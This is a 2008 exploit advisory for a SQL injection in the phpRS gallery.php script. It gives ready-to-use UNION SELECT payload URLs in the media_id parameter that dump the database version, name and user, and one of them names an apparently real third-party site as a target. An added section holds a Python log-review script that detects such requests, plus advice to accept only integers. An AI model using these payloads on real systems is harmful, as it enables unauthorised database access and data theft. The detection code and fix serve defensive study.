[~]--------------------------------------------------------------------------------
[~] phpRS 2.6.x and 2.8.X (gallery.php) SQL Injection Vulnerability
[~]
[~] http://www.supersvet.cz/download.php
[~]
[~] ------------------------------------------------------------
[~] Bug found by d3v1l [Avram Marius]
[~]
[~] Date: 20.11.2008
[~]
[~] d3v1l@spoofer.com http://security-sh3ll.com
[~]
[~] ------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] milw0rm <-> packetstorm staff
[~]--------------------------------------------------------------------------------
[~] Exploit :- gallery.php?akce=obrazek_ukaz&media_id=
[~]
[~] http://site.com/gallery.php?akce=obrazek_ukaz&media_id=1'UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16/*
[~]
[~] Ex :-
[~]
[~] http://www.kobravs.com/gallery.php?akce=obrazek_ukaz&media_id=1'UNIONSELECT 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16/*
[~]--------------------------------------------------------------------------------
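
Added example, not part of the original advisory: a log-review check a site operator could run to find requests to gallery.php whose media_id is not a plain integer. It assumes combined-format web access logs and that legitimate media_id values are numeric; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; the client addresses are documentation placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Nov/2008:10:00:01 +0100] "GET /gallery.php?akce=obrazek_ukaz&media_id=17 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [20/Nov/2008:10:00:07 +0100] "GET /gallery.php?akce=obrazek_ukaz&media_id=1%27UNION%20SELECT%201,2,3/* HTTP/1.1" 200 734',
    '192.0.2.66 - - [20/Nov/2008:10:00:09 +0100] "GET /gallery.php?akce=obrazek_ukaz&media_id=1%27+union+select+1,2/* HTTP/1.1" 200 700',
    '192.0.2.11 - - [20/Nov/2008:10:01:30 +0100] "GET /gallery.php?akce=obrazek_ukaz&media_id=abc HTTP/1.1" 200 90',
    '192.0.2.12 - - [20/Nov/2008:10:02:00 +0100] "GET /index.php?media_id=x HTTP/1.1" 200 4000',
]

# Client address and request target from a combined-format line.
# The target is matched with .+ so that unencoded spaces in a request do not hide it.
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (.+) HTTP/[\d.]+"'
)

# Markers seen in the advisory's request: a quote, UNION ... SELECT, a comment opener.
SQL_MARKER_RE = re.compile(r"'|\bunion\b.*\bselect\b|/\*|--", re.IGNORECASE)


def suspicious_media_id_requests(lines):
    """Return (client, decoded media_id, has_sql_markers) for every
    gallery.php request whose media_id is not a plain integer."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/gallery.php"):
            continue
        # parse_qs percent-decodes values and turns '+' into a space.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("media_id", []):
            if not re.fullmatch(r"\d+", value):
                hits.append((client, value, bool(SQL_MARKER_RE.search(value))))
    return hits


if __name__ == "__main__":
    for client, value, sqli in suspicious_media_id_requests(SAMPLE_LOG):
        print(f"{client}\tmedia_id={value!r}\tsql_markers={sqli}")
```

The same integer-only rule is the fix on the application side: reject or cast media_id before it reaches the query.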